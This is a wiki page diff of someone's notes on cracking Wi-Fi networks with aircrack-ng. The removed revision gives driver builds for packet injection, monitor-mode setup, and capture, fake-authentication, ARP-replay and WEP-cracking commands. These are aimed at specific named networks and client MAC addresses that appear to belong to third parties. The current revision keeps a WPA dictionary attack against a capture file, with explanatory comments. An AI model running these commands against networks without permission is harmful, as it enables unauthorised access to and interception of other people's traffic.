|
|
(12 intermediate revisions by 4 users not shown) |
Line 2: |
Line 2: |
| yum -y install aircrack-ng | | yum -y install aircrack-ng |
|
| |
|
| For compiling injection drivers.
| | aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de |
| yum -y install kernel-headers
| |
| | |
| Optionally install kismet.
| |
| yum -y install kismet
| |
| | |
| ==compile injection enabled drivers==
| |
| | |
| rt73
| |
| wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
| |
| tar -xjf rt73-k2wrlz-2.0.1.tar.bz2
| |
| cd rt73-k2wrlz-2.0.1/Module
| |
| make
| |
| make install
| |
| modprobe rt73
| |
| | |
| rt61
| |
| wget http://rt2x00.serialmonkey.com/rt61-cvs-daily.tar.gz
| |
| tar xvfz rt61-cvs-daily.tar.gz
| |
| cd rt61-cvs-*
| |
| cd Module
| |
| make
| |
| make install
| |
| | |
| madwifi-ng
| |
| svn -r 2834 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng2834
| |
| wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
| |
| cd madwifi-ng2834
| |
| patch -Np1 -i ../madwifi-ng-r2277.patch
| |
| ./scripts/madwifi-unload
| |
| make
| |
| make install
| |
| depmod -ae
| |
| modprobe ath_pci
| |
| | |
| ==operation==
| |
| | |
| Load and tweaked driver.
| |
| ifconfig rausb0 up
| |
| iwconfig rausb0 mode monitor
| |
| iwpriv rausb0 rfmontx 1
| |
| | |
| Change speed on network card.
| |
| iwconfig rausb0 rate 1M
| |
| | |
| Write comunication from ap.
| |
| airodump-ng --write wifi-network1 --channel 11 --bssid 00:90:4C:7E:00:6E rausb0
| |
| | |
| Generate network comunication.
| |
| aireplay-ng --arpreplay -b 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0
| |
| | |
| Crack web key.
| |
| aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap
| |
| | |
| ==kismet==
| |
| | |
| kismet
| |
| | |
| /etc/kismet/kismet.conf | |
| source=iwl4965,wlan0,addme
| |
| source=rt73,wlan1,wlan1
| |
| source=rt73,rausb0,rausb0
| |
| source=rt2500,rausb0,RT73
| |
| | |
| ==Information==
| |
| | |
| netgear DWL-G122
| |
| mac: 00:1B:11:BC:D5:1B
| |
| | |
| Name : B2_private_49
| |
| SSID : B2_private_49
| |
| BSSID : 00:01:38:9A:91:EC
| |
| Channel : 11
| |
| | |
| Name : vgrox
| |
| SSID : vgrox
| |
| BSSID : 00:13:46:E1:2F:4F
| |
| Channel : 9
| |
| client: 00:13:46:E1:2F:4F
| |
| | |
| airodump-ng --ivs --write dump2 --channel 9 --bssid 00:13:46:E1:2F:4F rausb0
| |
| | |
| ifconfig rausb0 up
| |
| iwconfig rausb0 mode monitor
| |
| iwpriv rausb0 rfmontx 1
| |
| | |
| ==atheros==
| |
| wlanconfig ath create wlandev wifi0 wlanmode monitor
| |
| | |
| ifconfig ath0 down
| |
| wlanconfig ath0 destroy
| |
| wlanconfig ath create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor|wds|ahdemo]
| |
| | |
| ==ongoing==
| |
| 00:40:96:a6:ca:1b
| |
| 00:40:96:a6:ca:1c
| |
| 06:40:96:A6:CA:1C
| |
|
| |
| Name : default
| |
| ESSID : default
| |
| BSSID : 00:13:46:4B:37:DE
| |
| Channel : 6
| |
|
| |
| 00:16:CE:4C:B7:53
| |
|
| |
| airmon-ng stop ath0
| |
| airmon-ng start wifi0 6
| |
| capture iv:s.
| |
| airodump-ng -c 6 --bssid 00:13:46:4B:37:DE -w airdump-ng-defaul ath0
| |
| fake authentication -e name -a -a access point MAC address -h
| |
| aireplay-ng -1 0 -e default -a 00:14:6C:7E:40:80 -h 00:40:96:a6:ca:1c ath0
| |
| aireplay-ng -1 0 -e default -a 00:13:46:4B:37:DE -h 06:40:96:A6:CA:1C ath0
| |
| aireplay-ng -3 -b 00:13:46:4B:37:DE -h 00:16:CE:4C:B7:53 ath0
| |
Install aircrack-ng
# Install the aircrack-ng suite from the configured yum repositories,
# answering yes to every prompt.
yum install -y aircrack-ng

# Test the capture file against a wordlist (-w). Going by the file name this
# is a WPA capture; a dictionary run like this only recovers the passphrase if
# the capture holds a complete handshake and the passphrase appears in the
# wordlist, so a long random passphrase is what defeats it.
# NOTE(review): the wordlist path is not created by the yum step above;
# confirm it exists on this host.
aircrack-ng -w /pentest/passwords/wordlists/darkc0de WPAcrack-01.cap